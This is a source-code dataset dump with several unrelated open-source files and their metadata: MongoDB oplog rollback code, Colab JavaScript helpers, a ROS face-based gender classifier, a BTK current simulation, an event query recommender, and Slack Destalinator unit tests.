).sort('$natural', pymongo.DESCENDING).limit(1)
if curr.count(with_limit_and_skip=True) == 0:
return None
logging.debug("OplogThread: Last oplog entry has timestamp %d."
% curr[0]['ts'].time)
return curr[0]['ts']
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
"""
logging.debug("OplogThread: Initializing the oplog cursor.")
timestamp = self.read_last_checkpoint()
if timestamp is None and self.collection_dump:
timestamp = self.dump_collection()
if timestamp:
msg = "Dumped collection into target system"
logging.info('OplogThread: %s %s'
% (self.oplog, msg))
elif timestamp is None:
# set timestamp to top of oplog
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
self.checkpoint = timestamp
cursor = self.get_oplog_cursor(timestamp)
if cursor is not None:
self.update_checkpoint()
return cursor
def update_checkpoint(self):
"""Store the current checkpoint in the oplog progress dictionary.
"""
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
oplog_dict[str(self.oplog)] = self.checkpoint
logging.debug("OplogThread: oplog checkpoint updated to %s" %
str(self.checkpoint))
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
if oplog_str in oplog_dict.keys():
ret_val = oplog_dict[oplog_str]
logging.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
logging.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}},
sort=[('$natural', pymongo.DESCENDING)]
)
logging.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = namespace
for source_name, dest_name in self.dest_mapping.items():
if dest_name == namespace:
original_namespace = source_name
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
to_update = util.retry_until_ok(
self.main_connection[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
fields=self._fields
)
#doc list are docs in target system, to_update are
#docs in mongo
doc_hash = {} # hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
#delete the inconsistent documents
logging.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for doc in doc_hash.values():
try:
dm.remove(doc)
remov_inc += 1
logging.debug("OplogThread: Rollback, removed %s " %
str(doc))
except errors.OperationFailed:
logging.warning(
"Could not delete document during rollback: %s "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % str(doc)
)
logging.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
#insert the ones from mongo
logging.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
doc['_ts'] = util.bson_ts_to_long(rollback_cutoff_ts)
doc['ns'] = self.dest_mapping.get(namespace, namespace)
try:
insert_inc += 1
dm.upsert(doc)
except errors.OperationFailed as e:
fail_insert_inc += 1
logging.error("OplogThread: Rollback, Unable to "
"insert %s with exception %s"
% (doc, str(e)))
logging.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
| apache-2.0 | 1,205,969,537,052,731,600 | 39.97047 | 80 | 0.496445 | false | 4.877437 | false | false | false |
googlecolab/colabtools | google/colab/output/_js.py | 1 | 3073 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Colab helpers for interacting with JavaScript in outputframes."""
import json
from google.colab import _ipython
from google.colab import _message
_json_decoder = json.JSONDecoder()
def eval_js(script, ignore_result=False, timeout_sec=None):
"""Evaluates the Javascript within the context of the current cell.
Args:
script: The javascript string to be evaluated
ignore_result: If true, will return immediately
and result from javascript side will be ignored.
timeout_sec: blocks for that many seconds.
Returns:
Result of the Javascript evaluation or None if ignore_result.
"""
args = ['cell_javascript_eval', {'script': script}]
kernel = _ipython.get_kernel()
request_id = _message.send_request(*args, parent=kernel.shell.parent_header)
if ignore_result:
return
return _message.read_reply_from_input(request_id, timeout_sec)
_functions = {}
def register_callback(function_name, callback):
"""Registers a function as a target invokable by Javacript in outputs.
This exposes the Python function as a target which may be invoked by
Javascript executing in Colab output frames.
This callback can be called from javascript side using:
colab.kernel.invokeFunction(function_name, [1, 2, 3], {'hi':'bye'})
then it will invoke callback(1, 2, 3, hi="bye")
Args:
function_name: string
callback: function that possibly takes positional and keyword arguments
that will be passed via invokeFunction()
"""
_functions[function_name] = callback
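# A minimal registration sketch (the function name and callback below are
# hypothetical, not part of the library):
#
#     def _sum(*args, **kwargs):
#       return sum(args)
#
#     register_callback('notebook.sum', _sum)
#
# JavaScript in an output frame can then run
# colab.kernel.invokeFunction('notebook.sum', [1, 2, 3], {}).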
def _invoke_function(function_name, json_args, json_kwargs):
"""Invokes callback with given function_name.
This function is meant to be used by frontend when proxying
data from secure iframe into kernel. For example:
_invoke_function(fn_name, "'''" + JSON.stringify(data) + "'''")
Note the triple quotes: valid JSON cannot contain triple quotes,
so this is a valid literal.
Args:
function_name: string
json_args: string containing valid json, provided by user.
json_kwargs: string containing valid json, provided by user.
Returns:
The value returned by the callback.
Raises:
ValueError: if the registered function cannot be found.
"""
args = _json_decoder.decode(json_args)
kwargs = _json_decoder.decode(json_kwargs)
callback = _functions.get(function_name, None)
if not callback:
raise ValueError('Function not found: {function_name}'.format(
function_name=function_name))
return callback(*args, **kwargs)
| apache-2.0 | 8,002,486,483,341,580,000 | 31.691489 | 78 | 0.731207 | false | 4.006519 | false | false | false |
amasiero/approach_control | approach_control_people/nodes/approach_control_people/faces/GenderDiscover.py | 1 | 2283 | #!/usr/bin/env python
import cv2.cv
import imutils
import time
import smach
import smach_ros
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from approach_control_people.faces.Map import Map
from approach_control_people.faces.ULBP import ULBP
from approach_control_people.faces.lbp_utils import W, Authentify
from approach_control_people.faces.load_database import load_female_db as female_db
from approach_control_people.faces.load_database import load_male_db as male_db
class GenderDiscover(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['woman', 'man', 'fail'])
self.face_cascade = cv2.CascadeClassifier('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
self.bridge = CvBridge()
self.GRID = 16
self.SIZE = 128
self.m = Map('Regions')
self.m.MakeRegularCluster(self.SIZE, self.SIZE, self.GRID, self.GRID)
self.m.MakeRegions()
self.ulbp_face = ULBP(self.m)
self.ulbp_female = ULBP(self.m)
self.ulbp_male = ULBP(self.m)
self.ulbp_male.MakePattern(male_db())
self.ulbp_male.MakeHistogram()
self.ulbp_female.MakePattern(female_db())
self.ulbp_female.MakeHistogram()
self.gender = None
def is_woman(self, img):
self.ulbp_face.MakePattern(img)
self.ulbp_face.MakeHistogram()
return Authentify(self.ulbp_face.histogram, self.ulbp_female.histogram, self.ulbp_male.histogram, W) > 20.0
def callback(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, 'bgr8')
except CvBridgeError as e:
rospy.logerr(e)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
roi_gray = None
faces = self.face_cascade.detectMultiScale(
gray,
scaleFactor = 1.1,
minNeighbors = 10,
minSize = (100,100),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
for (x, y, w, h) in faces:
x1 = x + int(w * .1)
x2 = x1 + int(w * .8)
y1 = y + int(h * .2)
y2 = y1 + int(h * .8)
roi_gray = cv2.resize(gray[y1:y2, x1:x2], (128, 128))
self.gender = 'man'
if self.is_woman(roi_gray):
self.gender = 'woman'
def execute(self, userdata):
rospy.Subscriber('/image_raw', Image, self.callback)
rospy.sleep(5)
if self.gender is not None:
return self.gender
else:
			return 'fail'
| gpl-2.0 | -3,593,615,707,399,300,000 | 24.098901 | 119 | 0.700394 | false | 2.624138 | false | false | false
jithinbp/BTK_simulations | current_fermi.py | 1 | 2141 | import math
import pygrace
import pygame,os,time,sys
WIDTH=400
HEIGHT=100
size = [WIDTH,HEIGHT]
flags=pygame.SRCALPHA|pygame.HWSURFACE|pygame.HWACCEL
os.environ['SDL_VIDEO_WINDOW_POS'] = '700,100'
screen = pygame.display.set_mode(size,flags)
pygame.display.set_caption("Transmission and reflection")
def xmgrace():
global pg
try:
import pygrace
except:
print 'damn'
return
pg = pygrace.grace()
pg.xlabel('V -->>')
pg.ylabel('I -->')
pg.title('Current')
#globals
ev=1.6e-19
k=1#8.617e-5
delta=2*0.001
T=5.0/11605.0 # temperature in eV (1 eV = 11605 K)
z=1.0 #Barrier strength at the interface
#general form
def gamma2(u2):
return (u2+z*z*(2*u2-1) )**2
def u2(E):
return 0.5*(1+math.sqrt((E**2-delta**2)/(E**2)) )
def PA(E): #probability of andreev reflection
if E<delta:
t2=E*E + (delta*delta-E*E)*( (1+2*z*z)**2 )
return (delta*delta)/t2
else:
u=u2(E)
return u*(1-u)/gamma2(u)
def PB(E): #probability of ordinary reflection
if E<delta:
return 1-PA(E)
else:
u=u2(E)
return (2*u-1)*(2*u-1)*(1+z*z)*z*z/gamma2(u)
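# Quick sanity check (illustrative only): below the gap PB is defined as 1 - PA,
# so the two reflection probabilities should sum to one, e.g.
#     assert abs(PA(0.5*delta) + PB(0.5*delta) - 1.0) < 1e-9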
def fermi_fn(E):
#print 'E,k*T, E/(k*T) = ',E,k*T,E/(k*T)
x= 1.0/(math.exp(E/(T))+1)
return x
def integ(E,V):
x=(fermi_fn(E-V)-fermi_fn(E))*(1+PA(E)-PB(E))
return x
def current(V):
#integrate between reasonable limits ( not -inf to +inf )
I=0
dE=1.0e-3
E=0
while E<0.3:
Im=integ(E,V)*(dE)
Ip=integ(-E,V)*(dE)
I+=Im+Ip
E+=dE
#print 'E,I= ',E,I
return I
xmgrace()
pg.hold(1)
dump=open('TandR_Z0.txt','wt')
#XMGRACE PLOT FEATURES
# A=Black , B=red , C in green , D in Blue
def refresh(z):
pg.xlabel('E (Z = %2.2f) -->'%(z))
pg.clear()
pg.hold(1)
dump=open('I.txt','wt')
y=[]
x=[]
V=0
dV=1e-5
while V<3e-3:
j=V
g=current(V)
V+=dV
if(j):
#print j,g
x.append(j)
y.append(g)
dump.write('%f %f\n'%(j,g) )
pg.plot(x,y)
dump.write('\n')
dump.close()
ll=0
refresh(z)
run=True
while run:
event=pygame.event.wait()
if event.type == pygame.QUIT:
try:
pg.exit()
run=False
except:
sys.exit()
ll=0
try:
ll=event.button
if(ll==4):z+=0.1
elif (ll==5): z-=0.1
if z<0: z=0
except:
continue
if(ll):refresh(z)
| gpl-3.0 | 8,471,243,037,193,875,000 | 14.977612 | 58 | 0.609061 | false | 2.021719 | false | false | false |
anguoyang/SMQTK | OLD_ROOT/WebUI/QueryRecommend/query_recommend.py | 1 | 7183 | """
LICENCE
-------
Copyright 2013 by Kitware, Inc. All Rights Reserved. Please refer to
KITWARE_LICENSE.TXT for licensing information, or contact General Counsel,
Kitware, Inc., 28 Corporate Drive, Clifton Park, NY 12065.
"""
import os
import numpy as np
import json
thispath = os.path.dirname(os.path.abspath(__file__))
# commonly used words in event descriptions
additional_stop_words = ['event', 'name', 'explication', 'evidential', 'description', 'scene',
'objects', 'people', 'activities', 'audio']
# zero-shot queries keyed by event ID (E006-E015 and E021-E030; E000 is an empty fallback)
queries = dict()
queries['E000'] = ''
queries['E006'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting sc.has_audience sc.congregating' \
' ob.light_source ob.person'
queries['E007'] = 'sc.transporting sc.manmade sc.using_tools sc.asphalt ob.round_shape ob.car'
queries['E008'] = 'sc.congregating sc.has_audience ob.person sc.pavement' \
' ob.large_group_of_people ob.crowd ob.small_group_of_people ob.railing ob.floor'
queries['E009'] = 'sc.dirty sc.natural_light sc.natural ob.large_open_area sc.sunny sc.trees' \
' ob.truck ob.car ob.large_open_area ob.outdoor'
queries['E010'] = 'sc.working sc.dirty sc.enclosed_area'
queries['E011'] = 'sc.enclosed_area sc.wood_not_part_of_tree sc.electric_or_indoor_lighting'
queries['E012'] = 'sc.congregating sc.has_audience sc.asphalt sc.pavement' \
' ob.person ob.large_group_of_people ob.tree ob.sports_venue ob.crowd' \
' ob.small_group_of_people ob.railing ob.floor'
queries['E013'] = 'sc.asphalt sc.trees sc.natural_light sc.open_area' \
' ob.large_open_area ob.tree ob.rectangular_shape ob.door'
queries['E014'] = 'sc.using_tools sc.working sc.learning ob.round_shape'
queries['E015'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting'
queries['E021'] = 'sc.trees sc.vegetation sc.natural sc.open_area sc.pavement sc.asphalt sc.natural_light' \
' ob.tree ob.large_open_area ob.cloud ob.outdoor ob.sports_venue ob.sky ob.truck '
queries['E022'] = 'sc.learning sc.working sc.enclosed_area sc.dirty sc.using_tools sc.electric_or_indoor_lighting'
queries['E023'] = 'sc.asphalt sc.pavement sc.clouds' \
' ob.cloud ob.small_group_of_people ob.floor ob.sports_venue ob.railing'
queries['E024'] = 'sc.transporting sc.asphalt sc.trees sc.pavement ob.rectangular_shape ob.door'
queries['E025'] = 'sc.person ob.small_group_of_people ob.vertical_pattern'
queries['E026'] = 'sc.wood_not_part_of_tree sc.enclosed_area sc.working sc.using_tools sc.dirty' \
' ob.door ob.vertical_pattern ob.rectangular_shape ob.railing '
queries['E027'] = 'sc.natural sc.dirty sc.open_area sc.trees sc.natural_light' \
' ob.large_group_of_people ob.tree ob.outdoor ob.vertical_pattern ob.crowd ob.person '
queries['E028'] = 'sc.person sc.has_audience sc.enclosed_area ob.rectangular_shape ob.crowd'
queries['E029'] = 'sc.sunny sc.still_water sc.open_area sc.pavement sc.trees sc.manmade sc.asphalt' \
' ob.large_open_area ob.sports_venue ob.outdoor ob.horizontal_pattern'
queries['E030'] = 'sc.using_tools sc.working sc.dirty ob.railing ob.floor ob.face'
def read_words(_words):
words = []
with open(_words, 'r') as fid_stop_words:
for line in fid_stop_words:
if line[-1]=='\n':
line = line[:-1]
if line != '':
words.append(line)
return words
def preprocess(string, stop_words=None, special_char=None):
if stop_words is None:
_stop = thispath + '/stop_words.txt'
stop_words = read_words(_stop)
if special_char is None:
_special = thispath + '/special_characters.txt'
special_char = read_words(_special)
string = string.lower()
string = string.replace('\n', ' ')
string = string.replace('\t', ' ')
for schar in special_char:
string = string.replace(schar.decode("utf8"), '')
words = string.split(' ')
words_out = []
for w in words:
if not (w in stop_words) and len(w) > 0:
words_out.append(w)
return words_out
def generate_bow(string, dictionary):
bow = np.zeros(len(dictionary))
words = preprocess(string)
for w in words:
try:
bow[dictionary[w]] += 1
except KeyError:
# A word doesn't exist in the dictionary, so ignore it.
continue
if np.sum(bow) > 0:
bow /= np.sum(bow)
return bow
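# Illustrative example (hypothetical dictionary): with
#     d = {'bike': 0, 'tricks': 1}
#     bow = generate_bow('Bike tricks and more bike tricks', d)
# both known words occur twice, so the normalized bag-of-words is [0.5, 0.5];
# words that are not in the dictionary are simply ignored.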
def build_dictionary():
_stop = thispath + '/stop_words.txt'
_special = thispath + '/special_characters.txt'
stop_words = read_words(_stop) + additional_stop_words
special_char = read_words(_special)
words = []
for eid in range(6, 16) + range(21, 31):
string = ""
with open('./eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
words += preprocess(string, stop_words, special_char)
words = sorted(list(set(words)))
dictionary = dict()
for idx, w in enumerate(words):
dictionary[w] = idx
np.save('dictionary_event_description.npy', dictionary)
def generate_event_bow():
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
for eid in range(6, 16) + range(21, 31):
string = ""
with open(thispath + '/eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
bow_eid = generate_bow(string, dictionary)
np.save(thispath + '/eventbow/E%03d.npy' % eid, bow_eid)
def recommend_query(string):
'''
Return zero-shot queries based on event description
@param string: Event description in a string format
@return: Queries in a string format
'''
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
bow = generate_bow(string, dictionary)
min_dist = 1
detected_eid = 0 # if description matching fails, it will return an empty query.
for eid in range(6, 16) + range(21, 31):
bow_eid = np.load(thispath + '/eventbow/E%03d.npy' % eid)
dist = np.sqrt(np.sum((bow - bow_eid)**2))
if min_dist > dist:
min_dist = dist
detected_eid = eid
return queries['E%03d' % detected_eid]
if __name__ == '__main__':
# build_dictionary()
# generate_event_bow()
string = 'AExplication: Bikes are normally ridden with a person sitting down on ' \
'seat and holding onto the handlebars and steering with their hands. ' \
'Tricks consist of difficult ways of riding the bike, such as on ' \
'one wheel, steering with feet or standing on the seat; or intentional ' \
'motions made with the bike that are not simply slowing down/stopping ' \
'the bike, propelling it forward, or steering the bike as it'
q = recommend_query(string)
print q
| bsd-3-clause | 2,104,360,600,271,689,500 | 42.067485 | 114 | 0.622442 | false | 3.278412 | false | false | false |
rossrader/destalinator | tests/test_destalinator.py | 1 | 25539 | from datetime import date, datetime, timedelta
import mock
import os
import unittest
import destalinator
import slacker
import slackbot
sample_slack_messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Human human human.",
"ts": "1355517523.000005",
"edited": {
"user": "U2147483697",
"ts": "1355517536.000001"
}
},
{
"type": "message",
"subtype": "bot_message",
"text": "Robot robot robot.",
"ts": "1403051575.000407",
"user": "U023BEAD1"
},
{
"type": "message",
"subtype": "channel_name",
"text": "#stalin has been renamed <C2147483705|khrushchev>",
"ts": "1403051575.000407",
"user": "U023BECGF"
},
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Contemplating existence.",
"ts": "1355517523.000005"
},
{
"type": "message",
"subtype": "bot_message",
"attachments": [
{
"fallback": "Required plain-text summary of the attachment.",
"color": "#36a64f",
"pretext": "Optional text that appears above the attachment block",
"author_name": "Bobby Tables",
"author_link": "http://flickr.com/bobby/",
"author_icon": "http://flickr.com/icons/bobby.jpg",
"title": "Slack API Documentation",
"title_link": "https://api.slack.com/",
"text": "Optional text that appears within the attachment",
"fields": [
{
"title": "Priority",
"value": "High",
"short": False
}
],
"image_url": "http://my-website.com/path/to/image.jpg",
"thumb_url": "http://example.com/path/to/thumb.png",
"footer": "Slack API",
"footer_icon": "https://platform.slack-edge.com/img/default_application_icon.png",
"ts": 123456789
}
],
"ts": "1403051575.000407",
"user": "U023BEAD1"
}
]
sample_warning_messages = [
{
"user": "U023BCDA1",
"text":"This is a channel warning! Put on your helmets!",
"username":"bot",
"bot_id":"B0T8EDVLY",
"attachments": [{"fallback":"channel_warning", "id": 1}],
"type":"message",
"subtype":"bot_message",
"ts":"1496855882.185855"
}
]
class MockValidator(object):
def __init__(self, validator):
# validator is a function that takes a single argument and returns a bool.
self.validator = validator
def __eq__(self, other):
return bool(self.validator(other))
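# Illustrative use (the mocked method here is hypothetical): because __eq__
# defers to the validator, an assertion such as
#     some_mock.post_message.assert_called_with(MockValidator(lambda s: 'warning' in s))
# matches any argument for which the lambda returns True.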
class SlackerMock(slacker.Slacker):
def get_users(self):
pass
def get_channels(self):
pass
class DestalinatorChannelMarkupTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_multiple(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general multiple #general channel #general references."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> multiple <#ABC123|general> channel <#ABC123|general> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_hyphens(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #channel-with-hyphens references."
mock_slacker.add_channel_markup.return_value = "<#EXA456|channel-with-hyphens>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#EXA456|channel-with-hyphens> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_ignore_screaming(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference and ignore my #HASHTAGSCREAMING thanks."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference and ignore my #HASHTAGSCREAMING thanks."
)
class DestalinatorChannelMinimumAgeTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_old(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 60}
self.assertTrue(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_exactly_expected_age(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 30}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_young(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 1}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
target_archive_date = date.today() + timedelta(days=10)
target_archive_date_string = target_archive_date.isoformat()
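# Ten days in the future, so the date is always later than today when the
# earliest-archive-date tests below read it from config or the environment.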
class DestalinatorGetEarliestArchiveDateTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch.dict(os.environ, {'EARLIEST_ARCHIVE_DATE': target_archive_date_string})
def test_env_var_name_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = 'EARLIEST_ARCHIVE_DATE'
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_archive_date_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = target_archive_date_string
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_falls_back_to_past_date(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = None
self.assertEqual(
self.destalinator.get_earliest_archive_date(),
datetime.strptime(destalinator.PAST_DATE_STRING, "%Y-%m-%d").date()
)
class DestalinatorGetMessagesTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_default_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(len(self.destalinator.get_messages("general", 30)), len(sample_slack_messages))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_empty_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = []
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum('subtype' not in m for m in sample_slack_messages)
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_limited_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = ['bot_message']
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum(m.get('subtype', None) in (None, 'bot_message') for m in sample_slack_messages)
)
class DestalinatorGetStaleChannelsTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_default_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 0)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_specific_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 2)
class DestalinatorIgnoreChannelTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
def test_with_explicit_ignore_channel(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_matching_ignore_channel_pattern(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^stal']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
@mock.patch('tests.test_destalinator.SlackerMock')
    def test_with_non_matching_ignore_channel_pattern(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len']
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
def test_with_many_matching_ignore_channel_patterns(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len', 'lin', '^st']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_empty_ignore_channel_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = []
self.destalinator.config.config['ignore_channel_patterns'] = []
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
class DestalinatorStaleTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_sample_messages(self, mock_slacker):
